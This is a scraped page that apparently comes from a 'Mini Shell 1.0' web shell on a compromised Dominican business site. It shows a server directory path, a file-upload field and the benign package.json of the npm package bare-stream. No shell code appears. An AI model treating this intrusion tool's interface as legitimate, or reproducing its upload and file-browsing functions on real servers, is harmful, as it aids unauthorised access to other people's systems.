HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

Inicie Sesión en su Cuenta de Negocios

Olvidó Contraseña?
DIR: /var/www/node-app/node_modules/bare-stream/
Upload File :
Current File : //var/www/node-app/node_modules/bare-stream/package.json
{
  "name": "bare-stream",
  "version": "2.2.1",
  "description": "Streaming data for JavaScript",
  "exports": {
    ".": "./index.js",
    "./package": "./package.json",
    "./promises": "./promises.js"
  },
  "files": [
    "index.js",
    "promises.js"
  ],
  "scripts": {
    "test": "standard && bare test.js"
  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/holepunchto/bare-stream.git"
  },
  "author": "Holepunch",
  "license": "Apache-2.0",
  "bugs": {
    "url": "https://github.com/holepunchto/bare-stream/issues"
  },
  "homepage": "https://github.com/holepunchto/bare-stream#readme",
  "dependencies": {
    "b4a": "^1.6.6",
    "streamx": "^2.18.0"
  },
  "devDependencies": {
    "brittle": "^3.5.2",
    "standard": "^17.0.0"
  }
}